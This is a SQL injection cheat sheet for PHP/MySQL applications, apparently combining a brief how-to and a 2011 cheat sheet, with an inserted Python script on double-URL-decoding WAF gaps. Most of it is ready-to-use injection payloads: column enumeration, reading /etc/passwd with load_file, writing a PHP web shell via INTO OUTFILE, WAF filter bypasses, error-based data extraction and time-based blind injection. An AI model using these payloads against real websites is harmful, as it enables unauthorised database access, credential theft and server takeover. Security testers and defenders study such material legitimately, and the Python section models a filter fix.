SQL-Injection-cheat-sheet
- First, figure out the vulnerable parameter (inject a single quote, a double quote or a comment sequence into each parameter and watch for a database error or a change in the page).
NOTE: If it's a GET request, don't forget to URL-encode the characters.
Try blind injection payloads if the above commands do not produce an error.
Check whether the above queries work by appending a comment at the end.
- Now that we know the vulnerable parameter, let's try guessing the table name:
- Guessing columns:
- Now determine the number of columns in the current table (ORDER BY n succeeds until n exceeds the column count).
Let's say there are 3 columns.
- Now determine the vulnerable columns, i.e. the columns whose values are visible in the page (UNION SELECT a distinct marker into each column; if the first form is blocked, try an alternative).
Now, let's say columns 1 and 2 are shown in the web page.
- To further enumerate:
Let's say the database name is public and the table name is info, with two columns in it, id and name.
- Bypassing filters
We can use case switching or comments to bypass basic keyword filters.
- For Oracle DB
Oracle has no information_schema; use the data dictionary views instead (ALL_TABLES and ALL_TAB_COLUMNS, or USER_TABLES and USER_TAB_COLUMNS for the current schema). The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names
- For advanced exploitation, use sqlmap.
Useful Resources
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://garage4hackers.com/showthread.php?t=1990
Slack3rsecurity's SQL injection cheatsheet 2011.
Hello world! I have decided to write a cheatsheet containing all that I have learnt from 2 years in the web application security field. In this post I will be focusing on SQL injection in regards to a PHP/MySQL environment.
Comments
/* */ – multi-line comment.
# – single-line comment.
-- – single-line comment (MySQL requires whitespace after the dashes, so in a URL write --+ or -- -).
/*!...*/ – MySQL conditional comment: MySQL executes the contents, other parsers and naive filters see a comment.
Whitespaces.
+ (decodes to a space in a GET parameter), %20, %09, %0a, %0b, %0c, %0d, /**/, /*foo*/ (%2B decodes to a literal + and is not whitespace).
Global system variables and functions
@@datadir //MySQL data directory.
@@version_compile_os //OS MySQL is running on.
@@version //MySQL server version.
user() //Current database user.
@@log_error //Path to the error log.
database() //Current database.
Columns in a SELECT.
file.php?var=1 order by 10--+ //Unknown column '10' in 'order clause': the column count is the largest n that does not error.
file.php?var=1 and(select * from table)=(1)--+ //Operand should contain 9 column(s): the error leaks the column count of table.
Encoding. //Casting to a common character set avoids "Illegal mix of collations" errors in a UNION.
file.php?var=1 union select cast(version() as char character set latin1)--+ //5.0.11
file.php?var=1 union select convert(version(), binary)--+ //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)--+ //5.0.11
file.php?var=1 union select unhex(hex(version()))--+ //5.0.11
File_priv. //Reading and writing files needs the FILE privilege and a permissive (or empty) secure_file_priv on the server.
file.php?var=1 union select user()--+ //Checking the current user: root@localhost
file.php?var=1 union select file_priv from mysql.user where user='root'--+ //Checking the file privilege of the current user, Y = yes, N = no.
file.php?var=1 union select load_file('/etc/passwd')--+ //Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file('/etc/passwd')),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ //Loading system files with error-based injection.
file.php?var=1 union select "<?php system($_GET[c]);?>" into outfile '/dir/dir/shell.php'--+ //Write code to a file (the directory must be writable by the MySQL process and the file must not already exist).
file.php?var=1 limit 1 into outfile '/dir/dir/shell.php' lines terminated by "<?php system($_GET[c]);?>"--+ //Write to a file without a UNION.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*!select*/ version()--+ //MySQL conditional comments hide the keywords from a naive filter.
file.php?var=1 unUNIONion seleSELECTct version()--+ //Filter that strips each keyword only once.
file.php?var=1/**/union/**/select/**/version()--+ //Whitespace bypass.
file.php?var=1 UnION SElecT version()--+ //Mixed upper/lower case.
file.php?var=1 uni/**/on sel/**/ect version()--+ //Comment inside a keyword; not accepted by current MySQL versions, which treat the comment as a token separator.
file.php?var=1 uni%6Fn select version()--+ //URL encoding, for a filter that matches before the parameter is decoded.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--+ //Double URL encoding, taking advantage of a WAF that only decodes input once while the backend decodes it twice.
file.php?var=1 0x414141414141414141414141414141414141 union select version()--+ //Oversized input to exhaust the WAF's inspection buffer (the "buffer overflow" trick).
file.php?var=1 union select 0x3a3a3a--+ //Hex literal instead of a quoted string, sidestepping magic_quotes escaping.
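The double-encoding bypass above works only because the WAF and the backend disagree about how many times the parameter gets decoded. The following Python script, added here as an illustration and not part of the original cheat sheet, models that mismatch with a hypothetical WAF that decodes once, a hypothetical backend that decodes twice, and the bounded fixed-point normalisation a filter needs to close the gap. The signature, the payload and both components are constructed for the example.

```python
import re
from urllib.parse import unquote

# Hypothetical WAF signature: block anything that reads "union <whitespace> select".
UNION_SELECT = re.compile(r"union\s+select", re.IGNORECASE)


def naive_waf_allows(raw_query: str) -> bool:
    """Hypothetical WAF: URL-decode the raw query string exactly once, then match."""
    return UNION_SELECT.search(unquote(raw_query)) is None


def backend_sees(raw_query: str) -> str:
    """Hypothetical backend that decodes twice, e.g. the web server decodes the
    query string and the application then calls urldecode() on the value again."""
    return unquote(unquote(raw_query))


def normalise(raw_query: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing (bounded), so a filter inspects the
    same text the backend will execute no matter how many layers were applied."""
    current = raw_query
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def hardened_waf_allows(raw_query: str) -> bool:
    """Same signature as the naive WAF, but matched against the normalised value."""
    return UNION_SELECT.search(normalise(raw_query)) is None


def double_encode(payload: str) -> str:
    """Attacker side: percent-encode every byte, then encode the '%' signs again,
    so one round of decoding still yields percent-encoded, signature-free text."""
    once = "".join(f"%{byte:02X}" for byte in payload.encode())
    return once.replace("%", "%25")


if __name__ == "__main__":
    payload = "1 union select version()"      # constructed example input
    evasive = double_encode(payload)
    print("naive WAF allows plain payload:    ", naive_waf_allows(payload))
    print("naive WAF allows double-encoded:   ", naive_waf_allows(evasive))
    print("backend executes:                  ", backend_sees(evasive))
    print("hardened WAF allows double-encoded:", hardened_waf_allows(evasive))
```

The decoding loop is bounded on purpose: an unbounded one is a denial-of-service vector, and a filter that decodes more times than the backend will block legitimate data such as a literal %2520. The real fix is for the filter to reproduce the backend's exact decoding, not to guess at it.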
Extracting data from MySQL errors.
rand() //Duplicate-key error: floor(rand(0)*2) is evaluated again when a row is inserted into the GROUP BY temporary table, the key collides, and the error message carries the concatenated data.
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--+
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1)--+
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--+
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat((select users.password),0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1)--+ //Seeded rand(0) makes the collision deterministic; the derived table needs at least 3 rows.
name_const() (MySQL 5.0.12 to 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--+ //Duplicate column name error carries the value.
extractvalue() & updatexml() (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))--+ //XPath syntax error; only the first 32 characters of the expression are echoed, so page through longer values with substring().
file.php?var=1 and updatexml(rand(),concat(0x3a,version()),1)--+ //XPath syntax error (updatexml takes three arguments).
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)--+ //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)--+ //Credits BlackFan.
file.php?var=1 UNION SELECT * FROM (SELECT * FROM information_schema.tables JOIN information_schema.tables b)a--+ //"Duplicate column name" error reveals a column name without knowing it; add USING(name) for each name found to get the next one.
Injecting into an ORDER BY.
file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--+ //Conditional error: the subquery returns more than one row when the condition is false.
file.php?var=1,ExtractValue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))--+ //Error-based extraction through a second ORDER BY expression.
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1))>=100,1,BENCHMARK(2000000,MD5(NOW())))--+ //Time-based blind SQLi using BENCHMARK().
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))--+ //Time-based blind SQLi using SLEEP() (MySQL 5.0.12+).
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,.,",\',~,`,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5))--+ //Blind SQLi using bit shifting, credits to http://www.websec.ca
Have a question or something to add? Shoot me a message.
Helpful links.
http://www.websec.wordpress.com //Great blog with good posts on web application security.